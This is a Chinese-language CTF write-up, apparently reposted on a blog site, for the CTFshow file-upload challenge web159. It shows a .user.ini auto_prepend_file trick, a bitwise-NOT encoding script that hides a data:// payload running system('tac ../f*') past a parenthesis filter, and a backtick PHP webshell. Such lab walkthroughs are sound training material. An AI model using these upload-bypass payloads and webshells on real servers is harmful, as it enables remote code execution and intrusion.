目錄

• 思路
• 總結

---

思路

直接在burp里面改target和host的值,或者在本地發包


成功上傳.user.ini

auto_prepend_file=shell.png

相比之前題目的過濾發現()也不能用了,不過可以用取反和異或來繞過

不需要括號的函數

echo require include

Y1ng師傅的取反腳本,用data協議來執行代碼

<?php $a = "data://text/plain,<?php system('tac ../f*');?>"; echo "~("; for ($i = 0; $i < strlen($a); $i++) {echo "%".bin2hex(~$a[$i]); } echo ")"; //require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?>

由于post提交參數服務器不能自動url解碼,所以要想解碼一次再提交

訪問upload,拿到flag

---

總結

也可以用
shell.png

<?=`tac ../f*`?>

總結

以上是生活随笔為你收集整理的CTFshow 文件上传 web159的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。